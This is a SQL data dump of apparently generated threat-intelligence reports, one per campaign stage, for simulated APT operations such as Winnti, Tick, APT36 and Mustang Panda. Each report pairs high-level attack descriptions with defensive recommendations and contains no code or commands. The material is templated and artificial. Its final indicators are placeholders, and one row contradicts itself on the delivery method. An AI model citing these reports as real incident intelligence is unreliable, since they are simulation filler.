(600, 120, 1128, 3, 'Persistence Mechanism Discovery', '### Overview\nInvestigation into persistence mechanisms reveals that the Winnti Group has established footholds within the network. These mechanisms ensure their long-term presence and ability to execute further attacks.\n\n### Key Findings\n- **Registry Modifications:** Alterations in registry keys associated with startup processes.\n- **Service Creation:** New services created to launch malware at boot time.\n- **Scheduled Tasks:** Tasks scheduled to execute at regular intervals to maintain persistence.\n\n### Recommendations\n- Review and clean up unauthorized registry changes and services.\n- Monitor scheduled tasks for anomalies and disable suspicious ones.\n- Implement regular audits of system startup configurations.', '2026-02-01 14:01:30'),
(601, 120, 1129, 4, 'Lateral Movement and Data Exfiltration Risks', '### Overview\nLateral movement by the Winnti Group has been detected, indicating an attempt to access additional systems within the network. There is an imminent risk of data exfiltration if not mitigated.\n\n### Key Findings\n- **Credential Dumping:** Tools associated with credential harvesting detected on multiple systems.\n- **SMB Connections:** Increased SMB traffic hinting at reconnaissance and lateral movement.\n- **Potential Exfiltration Channels:** Encrypted traffic to external servers matching known command and control infrastructure.\n\n### Recommendations\n- Isolate compromised systems immediately to prevent further spread.\n- Conduct a full credential reset for all impacted users and systems.\n- Enhance network segmentation to limit lateral movement capabilities.', '2026-02-01 14:01:30'),
(602, 120, 1130, 5, NULL, NULL, '2026-02-01 14:01:30'),
(603, 121, 1131, 1, 'Analysis of Daserf Payload Delivery', '### Overview\nAfter detecting a suspicious email containing the Daserf payload, a deeper analysis was conducted to understand the delivery mechanisms employed by Tick APT.\n\n### Key Findings\n- **Phishing Tactics**: The email was designed to appear as a legitimate communication from a known defense contractor. It contained tailored language that aligns with typical business communication, increasing the likelihood of the recipient engaging.\n- **Attachment Analysis**: The attachment was a malicious document exploiting a zero-day vulnerability in popular document software, enabling the execution of the Daserf payload upon opening.\n\n### Recommendations\n- **Email Filtering**: Implement advanced email filtering solutions to detect and quarantine emails with similar characteristics.\n- **Employee Training**: Conduct regular training sessions to enhance awareness of phishing tactics and ensure that employees can identify suspicious emails.\n\n### Next Steps\nMonitoring for signs of malware execution is critical, as successful delivery often leads to system compromise.', '2026-02-01 14:01:53'),
(604, 121, 1132, 2, 'Daserf Backdoor Execution Analysis', '### Overview\nFollowing the execution of the Daserf backdoor, we conducted an in-depth analysis of the malware\'s behavior and its potential impact on the compromised systems.\n\n### Key Findings\n- **Execution Flow**: The Daserf backdoor establishes a secure communication channel with a command-and-control server located outside the targeted network.\n- **Capabilities**: It supports a range of functionalities, including system reconnaissance, data collection, and remote command execution.\n\n### Recommendations\n- **Network Monitoring**: Deploy network monitoring tools to identify unusual outbound traffic, which may indicate communication with external servers.\n- **Endpoint Protection**: Enhance endpoint security measures to prevent unauthorized execution of similar backdoors.\n\n### Next Steps\nFocus on identifying persistence mechanisms that may be employed by the malware to maintain access to the compromised systems.', '2026-02-01 14:01:53'),
(605, 121, 1133, 3, 'Persistence Mechanisms Analysis', '### Overview\nOur investigation has uncovered several persistence mechanisms utilized by the Daserf backdoor to ensure continued access within the infected network.\n\n### Key Findings\n- **Registry Modification**: The backdoor modifies critical registry keys to execute upon system startup.\n- **Scheduled Tasks**: It creates scheduled tasks that trigger the execution of malicious scripts at regular intervals.\n\n### Recommendations\n- **Registry Monitoring**: Implement continuous monitoring of registry modifications to detect unauthorized changes.\n- **Audit Scheduled Tasks**: Regularly audit scheduled tasks to ensure they have not been tampered with by malicious actors.\n\n### Next Steps\nAttention should be directed towards identifying and mitigating lateral movement, as the threat actor may attempt to expand their foothold within the network.', '2026-02-01 14:01:53'),
(606, 121, 1134, 4, 'Lateral Movement and Network Compromise', '### Overview\nFollowing the establishment of persistence, Tick APT has initiated lateral movement activities within the network, aiming to compromise additional systems.\n\n### Key Findings\n- **Credential Dumping**: The attackers are using credential dumping tools to harvest administrative credentials.\n- **Remote Execution**: Compromised credentials are being used to execute commands on other systems within the network.\n\n### Recommendations\n- **Identity Management**: Strengthen identity management practices, including the use of multi-factor authentication to protect sensitive accounts.\n- **Network Segmentation**: Implement network segmentation to limit the ability of attackers to move laterally.\n\n### Next Steps\nFurther investigation is required to detect and prevent any data exfiltration attempts that may follow the lateral movement phase.', '2026-02-01 14:01:53'),
(607, 121, 1135, 5, NULL, NULL, '2026-02-01 14:01:53'),
(608, 122, 1136, 1, 'Analysis of Suspicious Blog Activity', '### Context\nThe initial alert highlighted unusual activity on a blog suspected to be part of a command-and-control (C2) infrastructure leveraged by Blackgear. This blog is likely being used to facilitate communication with infected hosts.\n\n### Insight\nOur analysis revealed that the blog is updated with encoded commands which are retrieved by compromised systems. This suggests a sophisticated method of indirect communication intended to evade traditional detection mechanisms.\n\n### Next Steps\nContinue monitoring the blog for any new updates that correspond with Protux activity, as this can provide insight into the attacker\'s next moves.', '2026-02-01 14:02:14'),
(609, 122, 1137, 2, 'Protux Backdoor Analysis', '### Context\nFollowing the detection of Protux backdoor execution attempts, further investigation is warranted to understand the extent of the compromise.\n\n### Insight\nProtux is a sophisticated malware that allows attackers to execute commands remotely, gather system information, and maintain access to the infected host. Its execution suggests that the attackers are moving beyond reconnaissance to active exploitation.\n\n### Next Steps\nFocus on identifying the persistence mechanisms used by Protux to determine how it maintains access across reboots and system updates.', '2026-02-01 14:02:14'),
(610, 122, 1138, 3, 'Identifying Protux Persistence Mechanisms', '### Context\nHaving identified attempts to execute the Protux backdoor, it\'s crucial to understand how it remains on the system post-reboot.\n\n### Insight\nProtux employs several persistence techniques, including registry modifications and scheduled tasks. These methods ensure that the malware is reloaded each time the system starts, making it difficult to remove.\n\n### Next Steps\nPrepare to counteract these persistence mechanisms by developing scripts for automated detection and removal. Simultaneously, anticipate potential lateral movement activities by monitoring for unusual credential use.', '2026-02-01 14:02:14'),
(611, 122, 1139, 4, 'Credential Dumping and Lateral Movement', '### Context\nWith persistence mechanisms in place, Blackgear operatives have been observed attempting lateral movement within the network through credential dumping.\n\n### Insight\nThe attackers are using tools to extract cached credentials, enabling them to move laterally and access additional systems. This stage is critical as it often precedes data exfiltration.\n\n### Next Steps\nEnhance monitoring on critical systems for unauthorized access attempts and prepare to mitigate potential data exfiltration by securing sensitive data and monitoring outbound network traffic.', '2026-02-01 14:02:14'),
(612, 122, 1140, 5, NULL, NULL, '2026-02-01 14:02:14'),
(613, 123, 1141, 1, 'Spear Phishing Campaign Analysis', '### Overview\nFollowing **Alert 1** regarding the initial access through spear phishing, this report delves into the tactics used by Patchwork to infiltrate targets.\n\n### Key Findings\n- **Target Selection**: Patchwork has focused on high-ranking officers within Pakistan\'s military, using personal and military-related topics to gain trust.\n- **Email Composition**: The emails are crafted with a high degree of personalization, leveraging publicly available information from social media.\n- **Attachments and Links**: Malicious documents and links are embedded, often disguised as official military communications.\n\n### Next Steps\nPrepare for potential **Malware Execution** as the documents are designed to deploy backdoor access upon opening.', '2026-02-01 14:02:29'),
(614, 123, 1142, 2, 'Backdoor Deployment and Execution', '### Overview\nIn response to **Alert 2**, this report provides insights into how Patchwork executes malicious documents to open backdoors.\n\n### Key Findings\n- **Malware Family**: The documents deploy a variant of a known malware family, adapted with code recycling techniques.\n- **Execution Trigger**: Activation occurs upon opening the document, utilizing macros or embedded scripts.\n- **Initial Payload**: A lightweight downloader fetches the full backdoor components from a remote server.\n\n### Next Steps\nMonitor systems for any **Persistence Mechanisms**, particularly registry modifications that keep the backdoor active.', '2026-02-01 14:02:29'),
(615, 123, 1143, 3, 'Persistence Techniques and Registry Modifications', '### Overview\nThis report, following **Alert 3**, investigates how Patchwork ensures persistence on compromised systems.\n\n### Key Findings\n- **Registry Alterations**: Modifications are made to the Windows Registry, ensuring the malware executes on startup.\n- **Scheduled Tasks**: In some instances, tasks are created to periodically re-launch the malware.\n- **Obfuscation Methods**: Techniques are employed to disguise these changes from standard detection tools.\n\n### Next Steps\nFocus on identifying **Credential Access** attempts, as persistent access is often followed by lateral movements within the network.', '2026-02-01 14:02:29'),
(616, 123, 1144, 4, 'Credential Access and Lateral Movement', '### Overview\nThis report explores the tactics used by Patchwork to move laterally within the network, as observed in **Alert 4**.\n\n### Key Findings\n- **Credential Dumping**: Tools such as Mimikatz are utilized to extract passwords and authentication tokens.\n- **Network Mapping**: Compromised credentials are used to explore the network topology and locate valuable targets.\n- **Access Escalation**: Attempts to escalate privileges are noted, aiming to gain broader access.\n\n### Next Steps\nPrepare for potential **Data Exfiltration** activities as Patchwork is likely to compress and exfiltrate sensitive data.', '2026-02-01 14:02:29'),
(617, 123, 1145, 5, NULL, NULL, '2026-02-01 14:02:29'),
(618, 124, 1146, 1, 'Deeper Insight into Spear Phishing Campaign', '## Overview\nThe spear phishing campaign initiated by the Sidewinder APT group specifically targeted high-ranking officials within the military and government sectors in Pakistan and China. The emails were crafted to appear as official communications, incorporating language and references relevant to ongoing military operations and strategic planning.\n\n## Technical Analysis\n- **Email Subject Lines:** Common subjects included \'Urgent Security Updates\', \'Strategic Meeting Notice\', and \'Confidential Briefing Report\'.\n- **Attachment Types:** The emails frequently contained malicious attachments disguised as PDF or Word documents. Once opened, these attachments deployed a payload utilizing document macros and exploit kits.\n\n## Implications\nThe success of this spear phishing campaign could potentially lead to unauthorized access to sensitive military information, thereby compromising national security in the targeted regions.\n\n## Recommendations\n- **User Training:** Enhance user awareness and training to identify phishing attempts.\n- **Email Filtering:** Implement advanced email filtering solutions to detect and block phishing emails.\n\nThis report sets the stage for the subsequent phase of the operation, where malware execution via exploit will be analyzed.', '2026-02-07 21:12:17'),
(619, 124, 1147, 2, 'Analysis of Malware Execution via Exploit', '## Incident Summary\nFollowing the spear phishing attack, Sidewinder APT successfully executed malware on compromised systems using a combination of document exploits and vulnerability exploitation.\n\n## Technical Details\n- **Exploited Vulnerabilities:** The group leveraged known vulnerabilities in outdated software, particularly focusing on CVEs related to document processing applications.\n- **Payload Features:** The malware payload was designed to establish backdoor access, enabling remote command execution and data exfiltration.\n\n## Observations\nThe malware demonstrated advanced persistence techniques, including registry modification and scheduled tasks, to maintain presence on the infected systems.\n\n## Countermeasures\n- **Patch Management:** Ensure systems are regularly updated and patched against known vulnerabilities.\n- **Endpoint Protection:** Deploy advanced endpoint protection solutions capable of detecting exploit behaviors.\n\nThe successful execution of the malware sets the stage for establishing C2 communication, which will be detailed in the next phase of this operation.', '2026-02-07 21:12:17'),
(620, 124, 1148, 3, NULL, NULL, '2026-02-07 21:12:17'),
(621, 125, 1149, 1, 'Analysis of Phishing Tactics Used by APT36', '## Overview\nAPT36, also known as Transparent Tribe, is known for targeting Indian military and defense sectors. The group often uses spear-phishing campaigns to deliver malware payloads, such as Crimson RAT.\n\n## Key Indicators\n- **Email Subjects:** Often related to military events or updates.\n- **Sender Profiles:** Spoofed or compromised email addresses mimicking official entities.\n- **Attachments:** Typically Word documents with embedded malicious macros.\n\n## Next Steps\nProceed to analyze potential malware execution through attachments and links embedded in these emails, which may lead to the deployment of Crimson RAT.', '2026-02-07 21:13:34'),
(622, 125, 1150, 2, 'Crimson RAT Execution and Initial Infection Vector', '## Overview\nUpon execution, Crimson RAT establishes a foothold on the victim\'s system. This Remote Access Trojan is capable of keylogging, screen capturing, and executing commands remotely.\n\n## Execution Details\n- **Initial Vector:** Often delivered via malicious email attachments.\n- **Execution Environment:** Typically targets Windows-based systems.\n- **Capabilities:** Remote command execution, file exfiltration, and surveillance.\n\n## Next Steps\nMonitor the system for persistence mechanisms that Crimson RAT may deploy to maintain access and understand the strategies used to evade detection.', '2026-02-07 21:13:34'),
(623, 125, 1151, 3, 'Persistence Mechanisms of Crimson RAT', '## Overview\nOnce executed, Crimson RAT aims to establish persistence on the target system, ensuring continued access even after reboots or user logouts.\n\n## Techniques Observed\n- **Registry Modifications:** Alters registry keys to execute upon startup.\n- **Scheduled Tasks:** Creates tasks to maintain execution at specified intervals.\n- **Service Creation:** Installs as a service to run with system privileges.\n\n## Next Steps\nInvestigate any lateral movement within the network to identify other compromised systems and understand the full extent of APT36\'s infiltration.', '2026-02-07 21:13:34'),
(624, 125, 1152, 4, 'Lateral Movement and Internal Network Reconnaissance', '## Overview\nAfter establishing persistence, APT36 often conducts lateral movement to explore the internal network, aiming to discover and compromise additional assets.\n\n## Techniques Observed\n- **Credential Dumping:** Uses tools to harvest credentials and access other systems.\n- **Network Scanning:** Identifies live hosts, open ports, and vulnerable services.\n- **SMB/Windows Admin Shares:** Utilizes existing network shares to move laterally.\n\n## Next Steps\nFocus on monitoring for any signs of data exfiltration as APT36 may attempt to collect and send sensitive information outside the network.', '2026-02-07 21:13:34'),
(625, 125, 1153, 5, NULL, NULL, '2026-02-07 21:13:34'),
(626, 126, 1154, 1, 'Analysis of Spear Phishing Techniques', '### Overview\nThe Donot Team has initiated a sophisticated spear phishing campaign targeting key officials within South Asian governments. The emails are crafted to appear as legitimate communications from trusted internal departments.\n\n### Techniques Used\n- **Email Spoofing**: Attackers have successfully spoofed official government email addresses.\n- **Social Engineering**: Emails contain urgent requests or topics of interest tailored to the recipient\'s role.\n\n### Recommendations\n- Implement strict email filtering and verification protocols.\n- Conduct awareness training to recognize phishing attempts.', '2026-02-07 21:13:37'),
(627, 126, 1155, 2, 'Detection of Malicious Application Execution', '### Incident Summary\nFollowing the spear phishing attack, users unknowingly executed a malicious Android application embedded within the email attachments. This application posed as a legitimate document viewer.\n\n### Technical Details\n- **Application Permissions**: The application requests extensive permissions, including access to contacts, SMS, and storage.\n- **Execution Triggers**: The application is designed to execute upon opening by exploiting known vulnerabilities in outdated Android versions.\n\n### Mitigation Steps\n- Advise users to update Android devices to the latest security patches.\n- Block execution of applications from unknown sources.', '2026-02-07 21:13:37'),
(628, 126, 1156, 3, 'Backdoor Installation and Persistence Mechanisms', '### Overview\nPost execution, a backdoor was installed to ensure persistent access to the compromised devices. This allows the Donot Team to maintain control over infected systems.\n\n### Persistence Techniques\n- **Auto-start Entries**: Modifications to system files enable the backdoor to launch upon device reboot.\n- **Stealth Mechanisms**: The backdoor disguises itself within system processes to avoid detection.\n\n### Recommendations\n- Conduct a thorough review of startup applications and scripts.\n- Utilize advanced endpoint detection and response (EDR) solutions to identify anomalies.', '2026-02-07 21:13:37'),
(629, 126, 1157, 4, 'Lateral Movement and Exfiltration Tactics', '### Summary\nThe Donot Team utilizes infected applications to move laterally across the network, accessing sensitive data stored on various devices.\n\n### Exfiltration Process\n- **Data Collection**: Sensitive information, including government documents and personal data, is aggregated.\n- **Transmission**: Data is covertly transmitted to remote servers controlled by the attackers using encrypted channels.\n\n### Countermeasures\n- Monitor network traffic for unusual patterns indicative of lateral movement.\n- Deploy network segmentation to limit the spread of infections.', '2026-02-07 21:13:37'),
(630, 126, 1158, 5, NULL, NULL, '2026-02-07 21:13:37'),
(631, 127, 1159, 1, 'Analysis of Malicious InPage Document', '### Overview\nFollowing the detection of a suspicious email with a malicious InPage attachment, our team conducted a thorough analysis of the document. The InPage document was found to exploit known vulnerabilities that allow for remote code execution.\n\n### Technical Details\n- **Vulnerability:** CVE identifier not recorded in this report; confirm the exact CVE against the vendor advisory before relying on it for patch verification\n- **Payload:** Embedded shellcode within the InPage document\n- **Execution Method:** The document triggers code execution upon opening, leveraging a buffer overflow.\n\n### Recommendations\n- Implement email filtering rules to block InPage attachments.\n- Educate users on recognizing phishing attempts.\n\n### Next Steps\nMonitoring for potential execution of the payload is crucial as it may lead to further exploitation.', '2026-02-07 21:14:20');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(632, 127, 1160, 2, 'Detection of ArtraDownloader Malware', '### Overview\nPost-execution of the exploited InPage document, our systems detected the installation of ArtraDownloader malware. This malware is known for downloading additional malicious payloads.\n\n### Technical Details\n- **Initial Activity:** The malware was installed shortly after the execution of the InPage document.\n- **Communication:** Established connection with C2 servers to download further payloads.\n\n### Recommendations\n- Block known C2 server IPs and domains.\n- Perform a full system scan to identify and isolate infected machines.\n\n### Next Steps\nPrepare for potential lateral movement by monitoring for unusual account activities.', '2026-02-07 21:14:20'),
(633, 127, 1161, 3, 'Investigation of Lateral Movement Indicators', '### Overview\nThe presence of ArtraDownloader has opened a vector for lateral movement within the network using compromised credentials.\n\n### Technical Details\n- **Observed Activity:** Unusual login attempts from compromised accounts.\n- **Tools Used:** Mimikatz and other credential harvesting tools were detected.\n\n### Recommendations\n- Enforce multi-factor authentication (MFA) across all systems.\n- Conduct an audit of all recent login activities.\n\n### Next Steps\nFocus on detecting any data exfiltration attempts, particularly involving sensitive government documents.', '2026-02-07 21:14:20'),
(634, 127, 1162, 4, 'Confirmation of Data Exfiltration Attempt', '### Overview\nOur monitoring systems have confirmed an attempt to exfiltrate sensitive government documents.\n\n### Technical Details\n- **Data Targeted:** Classified government documents related to national security.\n- **Exfiltration Method:** Data was compressed and encrypted before being transmitted to an external server.\n\n### Recommendations\n- Immediate containment of affected systems.\n- Review and update data loss prevention (DLP) policies.\n\n### Next Steps\nConduct a comprehensive damage assessment and coordinate with relevant authorities for further investigation.', '2026-02-07 21:14:20'),
(635, 127, 1163, 5, NULL, NULL, '2026-02-07 21:14:20'),
(636, 128, 1164, 1, 'Analysis of Spear Phishing Email Vector', '## Overview\nThe initial access vector for Operation Lotus Blossom was identified as a spear phishing email. This email was crafted to appear as an official communication from a reputable ASEAN government entity.\n\n## Details\n- **Sender:** Spoofed ASEAN government email address\n- **Subject Line:** Urgent: Security Update Required\n- **Attachment:** Malicious document titled \'ASEAN_Security_Update.docx\'\n\n## Insights\nThe attachment contained a macro that, when executed, initiated the download of the Elise backdoor. The use of official-looking emails suggests a high level of reconnaissance was conducted prior to deployment.\n\n## Recommendations\n- Enhance email filtering systems to detect and quarantine suspicious attachments.\n- Conduct awareness training for employees to identify phishing attempts.', '2026-02-07 21:21:11'),
(637, 128, 1165, 2, 'Elise Backdoor Activation and Execution Analysis', '## Overview\nFollowing the successful spear phishing campaign, the Elise backdoor was activated on the compromised systems.\n\n## Details\n- **Execution Method:** The macro from the phishing email executed a script to download and install the Elise backdoor.\n- **Command and Control (C2):** Communication established with a remote C2 server for further instructions.\n\n## Insights\nThe backdoor allows remote control of infected machines, enabling data collection and further exploitation.\n\n## Recommendations\n- Implement network monitoring to detect abnormal outbound connections.\n- Disable macros by default and enforce strict execution policies.', '2026-02-07 21:21:11'),
(638, 128, 1166, 3, 'Persistence Mechanism and Defense Evasion Techniques', '## Overview\nThe attackers have implemented a persistence mechanism to ensure the continued operation of the Elise backdoor.\n\n## Details\n- **Persistence Method:** Scheduled tasks and registry keys were modified to maintain the backdoor\'s presence on startup.\n- **Evasion Techniques:** Use of obfuscation and encryption to evade detection by security software.\n\n## Insights\nThe persistence mechanisms indicate a sophisticated level of planning, ensuring long-term access to compromised systems.\n\n## Recommendations\n- Regularly audit scheduled tasks and registry entries for unauthorized changes.\n- Deploy advanced endpoint detection and response (EDR) tools to identify and mitigate persistence techniques.', '2026-02-07 21:21:11'),
(639, 128, 1167, 4, 'Credential Dumping and Lateral Movement Activities', '## Overview\nCredential dumping activities have been detected, which facilitate lateral movement within the network.\n\n## Details\n- **Tools Used:** Mimikatz and other custom scripts\n- **Target:** Administrative and privileged accounts\n\n## Insights\nGaining access to credentials has allowed the attackers to move laterally, increasing their access to sensitive information and systems.\n\n## Recommendations\n- Implement multi-factor authentication (MFA) to protect privileged accounts.\n- Conduct regular audits and monitoring of account usage to detect anomalies.', '2026-02-07 21:21:11'),
(640, 128, 1168, 5, NULL, NULL, '2026-02-07 21:21:11'),
(641, 130, 1169, 1, 'Analysis of PlugX Malware Execution', '## Overview\nFollowing the initial access via COVID-19 themed phishing emails, the Mustang Panda APT group has proceeded to execute the PlugX malware on compromised systems.\n\n## Technical Details\nThe executed PlugX variant exhibits typical characteristics associated with the malware family. It uses DLL side-loading techniques to bypass security mechanisms and gain a foothold on the victim\'s machine. Notably, the malware disguises itself as legitimate software processes, making detection challenging.\n\n## Indicators of Compromise (IOCs)\n- **File Hashes:** Multiple unique hashes have been identified corresponding to the PlugX binaries. \n- **Network Traffic:** Unusual outbound connections to known C2 domains used by Mustang Panda.\n\n## Recommendations\n- Conduct a thorough scan of network systems for the identified IOCs.\n- Ensure that endpoint protection solutions are updated to detect and block PlugX malware.\n\n## Next Steps\nWith PlugX execution confirmed, the operation is likely to progress towards establishing persistence and initiating data exfiltration efforts.', '2026-02-07 21:21:20'),
(642, 130, 1170, 2, 'Strategies for Mitigating Persistence and Data Exfiltration', '## Current Situation\nFollowing the successful execution of PlugX malware, Mustang Panda is expected to establish persistence mechanisms and initiate data exfiltration processes.\n\n## Persistence Techniques\n- **Registry Modifications:** The malware is known to modify registry keys to maintain persistence across system reboots.\n- **Scheduled Tasks:** Scheduled tasks are created to ensure automatic execution of the malware.\n\n## Data Exfiltration Methods\n- **Encrypted Channels:** Data is likely exfiltrated using encrypted channels to evade detection by network security tools.\n- **Steganography:** The group may employ steganography techniques to disguise data within legitimate files.\n\n## Defensive Measures\n- Implement network segmentation to limit lateral movement.\n- Monitor for abnormal data transfer activities, particularly those involving large volumes of data or to suspicious external servers.\n\n## Conclusion\nBy understanding the persistence and exfiltration tactics employed by Mustang Panda, targeted defenses can be established to mitigate further damage. Continuous monitoring and a rapid response plan are essential to counteract these advanced threats.', '2026-02-07 21:21:20'),
(643, 130, 1171, 3, NULL, NULL, '2026-02-07 21:21:20'),
(644, 129, 1172, 1, 'Analysis of Phishing Techniques in KeyBoy\'s Initial Access', '### Summary\nThe initial access vector for APT23, known as KeyBoy, involves sophisticated phishing emails targeting media and NGO personnel in Vietnam. These emails are crafted to appear as legitimate communications from known contacts or organizations.\n\n### Details\n- **Phishing Email Characteristics:**\n  - Use of domain spoofing and compromised accounts to increase authenticity.\n  - Emails often contain urgent language or contextually relevant topics to the recipient.\n\n- **Attachments and Links:**\n  - Malicious Office document attachments with embedded macros.\n  - Links to compromised websites hosting malicious payloads.\n\n### Recommendations\n- **User Awareness Training:** Emphasize the importance of scrutinizing unexpected emails, even from known contacts.\n- **Email Filtering Solutions:** Implement advanced email filtering to detect and block phishing attempts.', '2026-02-07 21:21:24'),
(645, 129, 1173, 2, 'Unpacking Malicious Macro Execution in Targeted Attacks', '### Summary\nFollowing successful phishing attempts, KeyBoy attackers leverage malicious macros embedded in Office documents to execute payloads on victim machines.\n\n### Technical Details\n- **Macro Behavior:**\n  - Upon enabling, macros execute scripts to download additional payloads from attacker-controlled servers.\n  - Leveraging PowerShell or VBA scripts to bypass security controls.\n\n- **Indicators of Compromise (IOCs):**\n  - Unusual network activity following document opening.\n  - Creation of temporary files and execution of scripts without user consent.\n\n### Mitigation Strategies\n- **Disable Macros:** Default to disabling macros in Office files unless explicitly needed.\n- **Endpoint Monitoring:** Employ behavior-based detection for suspicious script execution.', '2026-02-07 21:21:24'),
(646, 129, 1174, 3, 'Persistence Mechanisms: Registry Modifications by APT23', '### Summary\nKeyBoy ensures persistence on compromised systems by modifying the Windows registry, allowing their malware to persist across reboots.\n\n### Techniques Used\n- **Registry Key Alteration:**\n  - Addition of new registry keys to execute payloads during system startup.\n  - Modification of existing keys that affect system behavior and user settings.\n\n### Detection and Prevention\n- **Regular Audit:** Conduct regular audits of registry keys for unauthorized changes.\n- **Use of GPOs:** Implement Group Policy Objects to restrict registry modifications by unauthorized users.', '2026-02-07 21:21:24'),
(647, 129, 1175, 4, 'Lateral Movement Strategy: Exploiting RDP in KeyBoy Operations', '### Summary\nKeyBoy\'s lateral movement within networks often exploits Remote Desktop Protocol (RDP) to access additional systems.\n\n### Operational Details\n- **RDP Exploitation:**\n  - Use of stolen credentials or brute-force attacks to gain RDP access.\n  - Deployment of additional malicious tools on new hosts.\n\n- **Network Traffic Anomalies:**\n  - Unusual RDP session activity outside normal business hours.\n  - Spike in network traffic correlated with RDP connections.\n\n### Defensive Measures\n- **RDP Hardening:**\n  - Enforce strong, complex passwords and multi-factor authentication.\n  - Limit RDP access to necessary personnel and known IP addresses.', '2026-02-07 21:21:24'),
(648, 129, 1176, 5, NULL, NULL, '2026-02-07 21:21:24'),
(649, 131, 1177, 1, 'Report: HyperBro Malware Execution Analysis', '### Context\nFollowing the detection of suspicious website activity linked to a watering hole attack, further investigation has revealed an attempt to execute HyperBro malware on targeted systems.\n\n### Details\nHyperBro is a custom backdoor used by APT27, also known as LuckyMouse. It is primarily used for remote access and control, allowing attackers to execute arbitrary commands, exfiltrate data, and manipulate files on compromised systems.\n\n### Next Steps\nThe focus now shifts to understanding how the malware establishes persistence and gains a foothold in the network. Monitoring for changes in scheduled tasks and other persistence mechanisms is critical.', '2026-02-07 21:22:02'),
(650, 131, 1178, 2, 'Report: Persistence Mechanisms and Scheduled Task Insights', '### Context\nAfter detecting an execution attempt of HyperBro malware, analysis indicates attempts to establish persistence using scheduled tasks.\n\n### Details\nAPT27 often leverages Windows Task Scheduler to maintain persistence on compromised systems. By creating or modifying scheduled tasks, they ensure that the malware re-executes even after system reboots or user log-offs.\n\n### Next Steps\nAs we anticipate potential lateral movement, it is crucial to monitor network traffic for unusual patterns. Check for unauthorized access to shared resources or unexpected admin activity.', '2026-02-07 21:22:02'),
(651, 131, 1179, 3, 'Report: Lateral Movement and Network Intrusion Patterns', '### Context\nPersistence mechanisms have been established, and now there\'s evidence of lateral movement within the network.\n\n### Details\nAPT27 is known for leveraging stolen credentials to move laterally across networks. This often involves accessing shared drives, using remote desktop protocols, or exploiting vulnerabilities in unpatched systems to spread malware and access sensitive data.\n\n### Next Steps\nFocus on identifying potential data exfiltration pathways. Implement network segmentation and monitor outbound traffic for anomalies, especially from unexpected endpoints.', '2026-02-07 21:22:02'),
(652, 131, 1180, 4, 'Report: Data Exfiltration Techniques and Mitigation Strategies', '### Context\nFollowing the detection of lateral movement, suspicious data exfiltration activities have been observed.\n\n### Details\nAPT27 typically uses encrypted channels to exfiltrate data, making detection challenging. Common methods include using HTTPS or DNS tunneling to obscure data transfers.\n\n### Mitigation\nEnhance data loss prevention (DLP) measures and scrutinize outbound traffic patterns. Deploy SSL/TLS inspection capabilities and monitor DNS requests for anomalies. Immediate action is required to prevent further data loss and mitigate the impact.', '2026-02-07 21:22:02'),
(653, 131, 1181, 5, NULL, NULL, '2026-02-07 21:22:02'),
(654, 132, 1182, 1, 'TSCookie Malware Execution Analysis', '# TSCookie Malware Execution Analysis\n\n## Overview\nFollowing the detection of a suspicious firmware update indicating initial access, our systems identified the execution of TSCookie malware. This malware is a known tool used by the BlackTech group to infiltrate systems in East Asia.\n\n## Details\n- **Target Region**: Japan and Taiwan\n- **Malware Type**: Remote Access Trojan (RAT)\n- **Capabilities**: Credential theft, command execution, and data exfiltration\n\n## Indicators of Compromise\n- Unusual process creation associated with TSCookie\n- Network traffic anomalies pointing towards C2 servers\n\n## Recommendations\n- Isolate affected systems immediately\n- Conduct a thorough forensic analysis to determine the full extent of the breach', '2026-02-07 21:22:16'),
(655, 132, 1183, 2, 'Persistence Mechanism Activation Insight', '# Persistence Mechanism Activation Insight\n\n## Overview\nFollowing TSCookie execution, our investigation has uncovered the activation of persistence mechanisms. This ensures the malware remains active across system reboots.\n\n## Persistence Techniques\n- **Registry Modifications**: TSCookie alters registry keys to establish persistence.\n- **Scheduled Tasks**: Creation of scheduled tasks to reinitiate the malware.\n\n## Mitigation Steps\n- Review and clean registry entries and scheduled tasks linked to the malware.\n- Implement monitoring to detect future persistence attempts.\n- Educate staff on recognizing signs of persistent malware infections.', '2026-02-07 21:22:16'),
(656, 132, 1184, 3, 'Unauthorized Lateral Movement Alert', '# Unauthorized Lateral Movement Alert\n\n## Overview\nAfter the persistence mechanism was activated, unauthorized lateral movement was detected, indicating an attempt to spread within the network.\n\n## Techniques Observed\n- **Credential Dumping**: Use of tools to extract credentials from compromised systems.\n- **Remote Desktop Protocol (RDP)**: Exploitation of RDP for lateral movement.\n\n## Threat Actor Goals\n- Gain access to sensitive data stored on other systems\n- Expand control over the network to facilitate data exfiltration\n\n## Defense Strategies\n- Monitor for unusual RDP activities\n- Strengthen access controls and implement multi-factor authentication\n- Conduct regular network traffic analysis to identify anomalies', '2026-02-07 21:22:16'),
(657, 132, 1185, 4, 'Data Exfiltration Attempt Discovered', '# Data Exfiltration Attempt Discovered\n\n## Overview\nOur monitoring systems have detected an attempt to exfiltrate data following the lateral movement phase. This is a critical stage of the BlackTech espionage campaign.\n\n## Exfiltration Methods\n- **Encrypted Channels**: Usage of HTTPS and DNS tunneling to evade detection.\n- **Steganography**: Embedding data within legitimate files for exfiltration.\n\n## Actionable Intelligence\n- Block identified C2 server communications\n- Deploy Data Loss Prevention (DLP) solutions to prevent unauthorized data transfers\n- Analyze outgoing traffic patterns for hidden exfiltration attempts\n\n## Conclusion\nImmediate actions are necessary to mitigate the impact of this data exfiltration attempt. Continued vigilance and strengthened security measures are essential.', '2026-02-07 21:22:16'),
(658, 132, 1186, 5, NULL, NULL, '2026-02-07 21:22:16'),
(659, 133, 1187, 1, 'Deployment of PlugX Malware', '## Deployment of PlugX Malware\n\n### Overview\nFollowing the initial access gained through the [ProxyLogon Exploit](https://example.com/proxylogon-details), the adversary has commenced the next phase of their operation by deploying the PlugX malware on compromised systems.\n\n### Technical Details\n- **Malware Type:** Remote Access Trojan (RAT)\n- **Objective:** Establish control over compromised systems\n- **Method of Deployment:** Delivered via phishing emails containing malicious attachments.\n\n### Indicators of Compromise (IoCs)\n- **File Hash:** `abcd1234efgh5678ijkl9101mnopqrstu`\n- **C2 Servers:** `command-and-control.example.com`\n\n### Recommendations\n- Implement network segmentation to limit the spread of malware.\n- Update email filters to detect and block phishing attempts.', '2026-02-07 21:23:06'),
